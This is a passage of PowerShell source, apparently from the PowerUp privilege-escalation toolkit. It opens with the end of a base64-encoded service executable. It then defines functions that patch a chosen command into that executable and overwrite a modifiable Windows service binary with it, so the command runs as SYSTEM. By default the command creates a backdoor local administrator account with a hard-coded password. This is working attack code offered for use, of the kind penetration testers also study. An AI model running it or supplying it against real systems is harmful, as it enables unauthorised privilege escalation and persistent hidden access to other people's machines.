AIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACA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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=\"\n        [Byte[]] $Binary = [Byte[]][Convert]::FromBase64String($B64Binary)\n\n        if ($PSBoundParameters['Command']) {\n            $ServiceCommand = $Command\n        }\n        else {\n            if ($PSBoundParameters['Credential']) {\n                $UserNameToAdd = $Credential.UserName\n                $PasswordToAdd = $Credential.GetNetworkCredential().Password\n            }\n            else {\n                $UserNameToAdd = $UserName\n                $PasswordToAdd = $Password\n            }\n\n            if ($UserNameToAdd.Contains('\\')) {\n                # only adding a domain user to the local group, no user creation\n                $ServiceCommand = \"net localgroup $LocalGroup $UserNameToAdd /add\"\n            }\n            else {\n                # create a local user and add it to the local specified group\n                $ServiceCommand = \"net user $UserNameToAdd $PasswordToAdd /add && timeout /t 5 && net localgroup $LocalGroup $UserNameToAdd /add\"\n            }\n        }\n    }\n\n    PROCESS {\n\n        $TargetService = Get-Service -Name $Name\n\n        # get the unicode byte conversions of all arguments\n        $Enc = [System.Text.Encoding]::Unicode\n        $ServiceNameBytes = $Enc.GetBytes($TargetService.Name)\n        $CommandBytes = $Enc.GetBytes($ServiceCommand)\n\n        # patch all values in to their appropriate locations\n        for ($i=0; $i -lt ($ServiceNameBytes.Length); $i++) {\n            # service name offset = 2458\n            $Binary[$i+2458] = $ServiceNameBytes[$i]\n        }\n        for ($i=0; $i -lt ($CommandBytes.Length); $i++) {\n            # cmd offset = 2535\n            $Binary[$i+2535] = $CommandBytes[$i]\n        }\n\n        Set-Content -Value $Binary -Encoding Byte -Path $Path -Force -ErrorAction Stop\n\n        $Out = New-Object PSObject\n        $Out | Add-Member Noteproperty 'ServiceName' $TargetService.Name\n        $Out | Add-Member Noteproperty 'Path' $Path\n        $Out | Add-Member Noteproperty 'Command' $ServiceCommand\n        $Out.PSObject.TypeNames.Insert(0, 'PowerUp.ServiceBinary')\n        $Out\n    }\n}\n\n\nfunction Install-ServiceBinary {\n<#\n.SYNOPSIS\n\nReplaces the service binary for the specified service with one that executes\na specified command as SYSTEM.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-ServiceDetail, Get-ModifiablePath, Write-ServiceBinary  \n\n.DESCRIPTION\n\nTakes a service Name or a ServiceProcess.ServiceController on the pipeline where the\ncurrent user can  modify the associated service binary listed in the binPath. Backs up\nthe original service binary to \"OriginalService.exe.bak\" in service binary location,\nand then uses Write-ServiceBinary to create a C# service binary that either adds\na local administrator user or executes a custom command. The new service binary is\nreplaced in the original service binary path, and a custom object is returned that\ncaptures the original and new service binary configuration.\n\n.PARAMETER Name\n\nThe service name the EXE will be running under.\n\n.PARAMETER UserName\n\nThe [domain\\]username to add. If not given, it defaults to \"john\".\nDomain users are not created, only added to the specified localgroup.\n\n.PARAMETER Password\n\nThe password to set for the added user. If not given, it defaults to \"Password123!\"\n\n.PARAMETER LocalGroup\n\nLocal group name to add the user to (default of 'Administrators').\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object specifying the user/password to add.\n\n.PARAMETER Command\n\nCustom command to execute instead of user creation.\n\n.EXAMPLE\n\nInstall-ServiceBinary -Name VulnSVC\n\nBacks up the original service binary to SERVICE_PATH.exe.bak and replaces the binary\nfor VulnSVC with one that adds a local Administrator (john/Password123!).\n\n.EXAMPLE\n\nGet-Service VulnSVC | Install-ServiceBinary\n\nBacks up the original service binary to SERVICE_PATH.exe.bak and replaces the binary\nfor VulnSVC with one that adds a local Administrator (john/Password123!).\n\n.EXAMPLE\n\nInstall-ServiceBinary -Name VulnSVC -UserName 'TESTLAB\\john'\n\nBacks up the original service binary to SERVICE_PATH.exe.bak and replaces the binary\nfor VulnSVC with one that adds TESTLAB\\john to the Administrators local group.\n\n.EXAMPLE\n\nInstall-ServiceBinary -Name VulnSVC -UserName backdoor -Password Password123!\n\nBacks up the original service binary to SERVICE_PATH.exe.bak and replaces the binary\nfor VulnSVC with one that adds a local Administrator (backdoor/Password123!).\n\n.EXAMPLE\n\nInstall-ServiceBinary -Name VulnSVC -Command \"net ...\"\n\nBacks up the original service binary to SERVICE_PATH.exe.bak and replaces the binary\nfor VulnSVC with one that executes a custom command.\n\n.OUTPUTS\n\nPowerUp.ServiceBinary.Installed\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingUserNameAndPassWordParams', '')]\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingPlainTextForPassword', '')]\n    [OutputType('PowerUp.ServiceBinary.Installed')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('ServiceName')]\n        [String]\n        [ValidateNotNullOrEmpty()]\n        $Name,\n\n        [String]\n        $UserName = 'john',\n\n        [String]\n        $Password = 'Password123!',\n\n        [String]\n        $LocalGroup = 'Administrators',\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty,\n\n        [String]\n        [ValidateNotNullOrEmpty()]\n        $Command\n    )\n\n    BEGIN {\n        if ($PSBoundParameters['Command']) {\n            $ServiceCommand = $Command\n        }\n        else {\n            if ($PSBoundParameters['Credential']) {\n                $UserNameToAdd = $Credential.UserName\n                $PasswordToAdd = $Credential.GetNetworkCredential().Password\n            }\n            else {\n                $UserNameToAdd = $UserName\n                $PasswordToAdd = $Password\n            }\n\n            if ($UserNameToAdd.Contains('\\')) {\n                # only adding a domain user to the local group, no user creation\n                $ServiceCommand = \"net localgroup $LocalGroup $UserNameToAdd /add\"\n            }\n            else {\n                # create a local user and add it to the local specified group\n                $ServiceCommand = \"net user $UserNameToAdd $PasswordToAdd /add && timeout /t 5 && net localgroup $LocalGroup $UserNameToAdd /add\"\n            }\n        }\n    }\n\n    PROCESS {\n        $TargetService = Get-Service -Name $Name -ErrorAction Stop\n        $ServiceDetails = $TargetService | Get-ServiceDetail\n        $ModifiableFiles = $ServiceDetails.PathName | Get-ModifiablePath -Literal\n\n        if (-not $ModifiableFiles) {\n            throw \"Service binary '$($ServiceDetails.PathName)' for service $($ServiceDetails.Name) not modifiable by the current user.\"\n        }\n\n        $ServicePath = $ModifiableFiles | Select-Object -First 1 | Select-Object -ExpandProperty ModifiablePath\n        $BackupPath = \"$($ServicePath).bak\"\n\n        Write-Verbose \"Backing up '$ServicePath' to '$BackupPath'\"\n\n        try {\n            Copy-Item -Path $ServicePath -Destination $BackupPath -Force\n        }\n        catch {\n            Write-Warning \"Error backing up '$ServicePath' : $_\"\n        }\n\n        $Result = Write-ServiceBinary -Name $ServiceDetails.Name -Command $ServiceCommand -Path $ServicePath\n        $Result | Add-Member Noteproperty 'BackupPath' $BackupPath\n        $Result.PSObject.TypeNames.Insert(0, 'PowerUp.ServiceBinary.Installed')\n        $Result\n    }\n}\n\n\nfunction Restore-ServiceBinary {\n<#\n.SYNOPSIS\n\nRestores a service binary backed up by Install-ServiceBinary.\n\nAuthor: Will Schroeder 